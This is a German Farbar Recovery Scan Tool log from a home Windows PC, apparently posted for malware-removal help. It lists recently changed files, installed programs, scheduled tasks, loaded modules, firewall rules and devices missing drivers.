2015-06-28 11:40 - 2015-07-26 09:50 - 00001098 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-06-28 11:40 - 2015-07-26 00:55 - 00001967 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-06-28 11:40 - 2015-06-28 11:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-06-28 11:39 - 2015-06-28 11:40 - 00000000 ____D C:\Users\SiRu\AppData\Local\Google
2015-06-28 11:39 - 2015-06-28 11:40 - 00000000 ____D C:\Program Files\Google
2015-06-28 09:41 - 2015-06-28 09:42 - 00000000 ____D C:\Users\SiRu\AppData\Local\{77A10D0C-31DB-4D57-9917-9D8C9896F3FC}
2015-06-27 09:58 - 2015-06-27 09:58 - 00000000 ____D C:\Users\SiRu\AppData\Local\{53974FB4-691D-46C5-A5FC-B590A776803E}
2015-06-27 08:59 - 2015-07-25 23:59 - 00000000 ____D C:\Users\SiRu\Desktop\Bilder Melvin
2015-06-26 07:19 - 2015-06-26 07:20 - 00000000 ____D C:\Users\SiRu\AppData\Local\{D282C682-71A2-4109-9BC3-6330803D9BCC}

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-07-26 10:04 - 2015-05-30 19:05 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-26 09:59 - 2015-04-22 18:58 - 01960368 _____ C:\Windows\WindowsUpdate.log
2015-07-26 09:51 - 2015-04-23 09:23 - 00000000 ____D C:\Users\SiRu\AppData\Roaming\Skype
2015-07-26 09:34 - 2015-06-23 14:08 - 00000000 ____D C:\Users\SiRu\AppData\Roaming\FileZilla
2015-07-26 08:32 - 2006-11-02 15:01 - 00032510 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-07-26 08:32 - 2006-11-02 15:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-26 08:32 - 2006-11-02 14:47 - 00004784 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-26 08:32 - 2006-11-02 14:47 - 00004784 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-24 18:00 - 2015-04-23 17:56 - 00000000 ____D C:\ProgramData\firebird
2015-07-22 17:00 - 2015-04-27 11:21 - 00000000 ____D C:\Users\SiRu\AppData\Local\gtk-2.0
2015-07-22 13:37 - 2015-04-27 11:18 - 00000000 ____D C:\Users\SiRu\.gimp-2.8
2015-07-22 09:00 - 2006-11-02 14:47 - 00262616 _____ C:\Windows\system32\FNTCACHE.DAT
2015-07-21 16:07 - 2012-08-30 21:12 - 00000000 ____D C:\Backups
2015-07-21 11:20 - 2006-11-02 12:33 - 01564930 _____ C:\Windows\system32\PerfStringBackup.INI
2015-07-16 09:06 - 2015-05-17 10:11 - 00000000 ____D C:\Windows\system32\MRT
2015-07-15 16:04 - 2015-05-04 10:17 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-07-15 16:04 - 2015-05-04 10:17 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-07-15 15:57 - 2015-05-04 10:16 - 00000000 ____D C:\Users\SiRu\AppData\Local\Adobe
2015-07-15 09:46 - 2015-05-30 19:17 - 00002425 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2015-07-14 13:02 - 2015-05-21 16:09 - 00001487 _____ C:\Windows\wiso.ini
2015-07-12 18:49 - 2015-04-23 09:23 - 00000000 ___RD C:\Program Files\Skype
2015-07-12 18:49 - 2015-04-23 09:23 - 00000000 ____D C:\ProgramData\Skype
2015-07-07 14:00 - 2015-05-24 10:01 - 00000000 ____D C:\Users\SiRu\AppData\Roaming\HpUpdate
2015-07-06 11:37 - 2015-05-06 09:38 - 00000000 ____D C:\Users\SiRu\Documents\Eigene Scans
2015-07-05 12:11 - 2015-04-23 06:37 - 00246952 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2015-07-04 15:38 - 2015-04-23 07:44 - 00057470 _____ C:\Windows\PFRO.log
2015-07-04 15:38 - 2015-04-22 20:20 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2015-07-04 12:49 - 2006-11-02 14:52 - 00037030 _____ C:\Windows\setupact.log
2015-07-03 08:49 - 2006-11-02 12:24 - 127070192 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-05-21 18:24 - 2015-05-21 18:37 - 0001188 _____ () C:\Users\SiRu\AppData\Local\crc32list11.txt
2015-04-22 19:10 - 2015-04-24 12:25 - 0007916 _____ () C:\Users\SiRu\AppData\Local\d3d9caps.dat
2015-06-08 11:45 - 2015-06-08 11:45 - 0003584 _____ () C:\Users\SiRu\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-07-22 17:00 - 2015-07-22 17:00 - 0034828 _____ () C:\Users\SiRu\AppData\Local\recently-used.xbel
2015-04-23 18:50 - 2015-04-24 12:33 - 0001514 _____ () C:\ProgramData\hpzinstall.log

Einige Dateien in TEMP:
====================
C:\Users\SiRu\AppData\Local\Temp\BSvcProcessor.exe
C:\Users\SiRu\AppData\Local\Temp\BSvcUpdater.exe


==================== Bamital & volsnap Check =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2015-07-26 08:45

==================== Ende vom log ============================

Addition

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x86) Version: 25-07-2015
durchgeführt von SiRu an 2015-07-26 10:11:45
Gestartet von C:\Users\SiRu\Desktop\Downloads
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3878630861-872424575-2572082325-500 - Administrator - Disabled)
Gast (S-1-5-21-3878630861-872424575-2572082325-501 - Limited - Enabled) => C:\Users\Gast
SiRu (S-1-5-21-3878630861-872424575-2572082325-1000 - Administrator - Enabled) => C:\Users\SiRu

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

32 Bit HP CIO Components Installer (Version: 7.1.8 - Hewlett-Packard) Hidden
Adobe Flash Player 18 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Reader X (10.1.15) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.15 - Adobe Systems Incorporated)
Bing Bar (HKLM\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation)
BufferChm (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Copy (Version: 100.0.170.000 - Hewlett-Packard) Hidden
CPUID CPU-Z 1.72 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
CustomerResearchQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Destination Component (Version: 100.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 100.0.190.000 - Hewlett-Packard) Hidden
DeviceManagementQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_ProductContext (Version: 100.0.215.000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_Software (Version: 100.0.206.000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_Software_Min (Version: 100.0.213.000 - Hewlett-Packard) Hidden
eSupportQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
F2200 (Version: 100.0.206.000 - Ihr Firmenname) Hidden
F2200_Help (Version: 100.0.206.000 - Hewlett-Packard) Hidden
FileZilla Client 3.11.0.2 (HKLM\...\FileZilla Client) (Version: 3.11.0.2 - Tim Kosse)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Google Chrome (HKLM\...\Google Chrome) (Version: 44.0.2403.107 - Google Inc.)
Google Update Helper (Version: 1.3.28.1 - Google Inc.) Hidden
GPBaseService (Version: 100.0.187.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 10.0 (HKLM\...\HPExtendedCapabilities) (Version: 10.0 - HP)
HP Deskjet F2200 All-In-One Driver Software 10.0 Rel .3 (HKLM\...\{D77D43B5-ED55-426b-B67B-E21F804F6102}) (Version: 10.0 - HP)
HP Imaging Device Functions 10.0 (HKLM\...\HP Imaging Device Functions) (Version: 10.0 - HP)
HP Photosmart Essential 2.5 (HKLM\...\HP Photosmart Essential) (Version: 2.5 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 3.5 - HP)
HP Solution Center 10.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 10.0 - HP)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (Version: 1.00.0001 - Microsoft) Hidden
HPProductAssistant (Version: 100.0.170.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Intel(R) Network Connections 18.4.59.0 (HKLM\...\PROSetDX) (Version: 18.4.59.0 - Intel)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
MarketResearch (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Mein Büro (HKLM\...\{11CF3ABC-DFB0-47DE-B31F-71CB995A12D7}_is1) (Version: 15.0 - Buhl Data Service GmbH)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Mozilla Firefox 39.0 (x86 de) (HKLM\...\Mozilla Firefox 39.0 (x86 de)) (Version: 39.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 37.0.2 - Mozilla)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OpenOffice 4.1.1 (HKLM\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
PSSWCORE (Version: 2.02.0000 - Hewlett-Packard) Hidden
Scan (Version: 10.0.0.0 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 10.0 - HP)
Skype™ 7.6 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.6.105 - Skype Technologies S.A.)
SmartWebPrintingOC (Version: 100.0.189.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 100.0.175.000 - Hewlett-Packard) Hidden
Status (Version: 100.0.175.000 - Hewlett-Packard) Hidden
Toolbox (Version: 100.0.170.000 - Hewlett-Packard) Hidden
TrayApp (Version: 100.0.170.000 - Hewlett-Packard) Hidden
UnloadSupport (Version: 10.0.0 - Hewlett-Packard) Hidden
VC_CRT_x86 (Version: 1.02.0000 - Intel Corporation) Hidden
VideoToolkit01 (Version: 100.0.128.000 - Hewlett-Packard) Hidden
WebReg (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
WISO Steuer-Sparbuch 2011 (HKLM\...\{02F0B8AE-7501-4333-AFBE-6BAABFEC7637}) (Version: 18.00.6928 - Buhl Data Service GmbH)
WISO Steuer-Sparbuch 2012 (HKLM\...\{0CC1DAFB-40C8-4903-953D-471E541477C7}) (Version: 19.14.8106 - Buhl Data Service GmbH)
WISO Steuer-Sparbuch 2013 (HKLM\...\{D6CC2FAF-F827-4091-96A1-D32CC9B69C79}) (Version: 20.11.8530 - Buhl Data Service GmbH)
WISO Steuer-Sparbuch 2014 (HKLM\...\{6ED5F0AC-1A6C-4D94-9728-82263D8D970D}) (Version: 21.08.8679 - Buhl Data Service GmbH)
WISO Steuer-Sparbuch 2015 (HKLM\...\{31E3F004-FA6C-49AC-9582-D8FB844ED597}) (Version: 22.06.8980 - Buhl Data Service GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

07-07-2015 14:31:37 Geplanter Prüfpunkt
08-07-2015 09:35:22 Geplanter Prüfpunkt
08-07-2015 11:41:09 Windows Update
09-07-2015 17:32:29 Geplanter Prüfpunkt
10-07-2015 10:23:14 Geplanter Prüfpunkt
12-07-2015 08:35:55 Windows Update
12-07-2015 20:50:06 Geplanter Prüfpunkt
13-07-2015 13:08:51 Geplanter Prüfpunkt
14-07-2015 16:37:45 Geplanter Prüfpunkt
15-07-2015 12:05:45 Geplanter Prüfpunkt
16-07-2015 08:51:04 Windows Update
17-07-2015 17:41:58 Geplanter Prüfpunkt
18-07-2015 08:46:32 Geplanter Prüfpunkt
19-07-2015 15:57:15 Geplanter Prüfpunkt
19-07-2015 20:36:22 Windows Update
20-07-2015 10:01:33 Geplanter Prüfpunkt
21-07-2015 13:15:37 Geplanter Prüfpunkt
22-07-2015 08:54:56 Windows Update
23-07-2015 11:41:32 Geplanter Prüfpunkt
24-07-2015 10:57:04 Geplanter Prüfpunkt
25-07-2015 17:55:17 Windows Update
26-07-2015 10:02:25 Geplanter Prüfpunkt

==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2006-11-02 12:23 - 2006-09-18 23:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {7E05E764-7803-44A8-938B-9C6EB9F442C7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-06-28] (Google Inc.)
Task: {953338EC-A1FF-4A96-85B5-19DDEB69D7EA} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-15] (Adobe Systems Incorporated)
Task: {A9C1534C-2F7E-4500-9B21-C7ADFEC6283B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {CADB958C-3B0E-41EC-A734-B103F77670C1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-06-28] (Google Inc.)
Task: {CB14869C-B349-4ED9-8759-3A4A1AF31F5B} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\VistaSP1CEIP => C:\Windows\servicing\vsp1ceip.exe [2008-01-18] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-06-02 17:20 - 2015-06-02 17:20 - 00039384 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2015-05-21 18:24 - 2015-03-18 13:06 - 01303320 _____ () C:\Program Files\WISO\Steuersoftware 2011\mshaktuell.exe
2015-05-21 18:21 - 2015-03-18 12:59 - 07775744 _____ () C:\Program Files\WISO\Steuersoftware 2011\wgui11.dll
2015-05-21 18:22 - 2015-03-18 13:00 - 00028672 _____ () C:\Program Files\WISO\Steuersoftware 2011\rsdcom47.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 02341376 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtCorers47.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 08854016 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtGuirs47.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 00925696 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtNetworkrs47.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 00357376 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtXmlrs47.dll
2015-05-21 18:22 - 2011-03-21 13:49 - 00701952 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtSqlrs47.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 01329152 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtScriptrs47.dll
2015-05-21 18:21 - 2011-02-01 10:17 - 02394112 _____ () C:\Program Files\WISO\Steuersoftware 2011\Qt3Supportrs47.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 11162624 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtWebKitrs47.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 00271360 _____ () C:\Program Files\WISO\Steuersoftware 2011\phononrs47.dll
2015-05-21 18:22 - 2015-03-18 12:49 - 00007168 _____ () C:\Program Files\WISO\Steuersoftware 2011\rscorewinapi47.dll
2015-05-21 18:22 - 2015-03-18 12:50 - 00314880 _____ () C:\Program Files\WISO\Steuersoftware 2011\rsguiwinapi47.dll
2015-05-21 18:21 - 2015-03-18 12:54 - 03111424 _____ () C:\Program Files\WISO\Steuersoftware 2011\wcore11.dll
2015-05-21 18:22 - 2015-03-18 13:00 - 00130048 _____ () C:\Program Files\WISO\Steuersoftware 2011\rsodbc47.dll
2015-05-21 18:21 - 2015-03-18 13:17 - 01891840 _____ () C:\Program Files\WISO\Steuersoftware 2011\wfvie11.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 00280576 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtSvgrs47.dll
2015-05-21 18:21 - 2015-03-18 12:51 - 01356288 _____ () C:\Program Files\WISO\Steuersoftware 2011\wsteu11.dll
2015-05-21 18:21 - 2015-03-18 13:01 - 01371648 _____ () C:\Program Files\WISO\Steuersoftware 2011\wreli11.dll
2015-05-21 18:21 - 2015-03-18 13:19 - 04333056 _____ () C:\Program Files\WISO\Steuersoftware 2011\wauff11.dll
2015-05-21 18:22 - 2011-02-01 10:17 - 00096256 _____ () C:\Program Files\WISO\Steuersoftware 2011\QtTestrs47.dll
2015-05-21 18:21 - 2015-03-18 13:19 - 04448768 _____ () C:\PROGRAM FILES\WISO\STEUERSOFTWARE 2011\wstyle11.dll
2015-05-21 18:23 - 2015-03-18 13:19 - 24973824 _____ () C:\PROGRAM FILES\WISO\STEUERSOFTWARE 2011\wstyle111.dll
2015-06-28 11:47 - 2014-02-10 13:44 - 04592128 _____ () C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libglesv2.dll
2015-06-28 11:47 - 2014-02-10 13:44 - 00112128 _____ () C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libegl.dll
2015-07-15 15:57 - 2015-07-15 15:57 - 17448624 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_18_0_0_209.dll
2015-07-26 00:55 - 2015-07-24 00:39 - 16308040 _____ () C:\Program Files\Google\Chrome\Application\44.0.2403.107\PepperFlash\pepflashplayer.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. The "AlternateShell" value will be restored.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer trusted/restricted ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3878630861-872424575-2572082325-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\SiRu\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== FirewallRules (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [{5EABB036-89F2-4E09-9228-A1AB40D2F6F1}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{6AC6B031-FFAC-43F8-B996-0EC3B6BC51B3}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{4080DCF4-9FFF-48A4-BFA9-9EA1B304F259}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe
FirewallRules: [{EE1E5B66-F7DE-407C-B48C-33AD733AA7DA}] => (Allow) LPort=80
FirewallRules: [{C00FC743-BA77-492C-8D0B-303E5CD04BC0}] => (Allow) LPort=80
FirewallRules: [{8820D144-0F4B-422C-B15A-B49822F6F02B}] => (Allow) LPort=80
FirewallRules: [{5A0D412C-13A9-4001-8344-B489CA5F47A7}] => (Allow) C:\Program Files\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{61A2F508-DB5F-46F6-A688-75E36253C169}] => (Allow) LPort=2869
FirewallRules: [{01543F4F-716C-403A-BCB7-7E7E23E25D14}] => (Allow) LPort=1900
FirewallRules: [{E16F57B7-E85C-4170-B578-332A6C454B05}] => (Allow) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{B2C8FCC6-FADE-44FE-96E2-C494B7E813C0}] => (Allow) C:\Program Files\Windows Live\Mesh\MOE.exe
FirewallRules: [{BCEADABC-ACE4-4E98-AC9E-5B601A80E00F}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{E7DBA1AB-BFE2-48BC-9854-30EB4F8A24A8}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{60049169-173A-4930-86C0-C38535BEFA9D}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{D05F59E0-4B52-4700-A40C-17F56D6A2317}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{203E8E7F-5E81-46D3-8682-33F1EBDA7DEC}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{19990ED4-FCA4-4085-AFD8-9C381A503005}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{E1BA7E11-4EB9-4B70-8A69-539DF7B233E3}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{E4EAB8C4-CD2F-41B4-89A4-F06A6A2B7E2D}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{E026CE45-FDDE-4613-B20F-24FD9A902D6C}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{F0AB1F71-CAD9-4C0E-A463-5DEDAFC3E312}] => (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{A5BEC9BB-86B8-4418-B0AB-CB1AB27A808B}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{69517216-0F56-4D45-A168-D4CC13744E3C}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: PCI-Kommunikationscontroller (einfach)
Description: PCI-Kommunikationscontroller (einfach)
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Serieller PCI-Anschluss
Description: Serieller PCI-Anschluss
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: SM-Bus-Controller
Description: SM-Bus-Controller
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
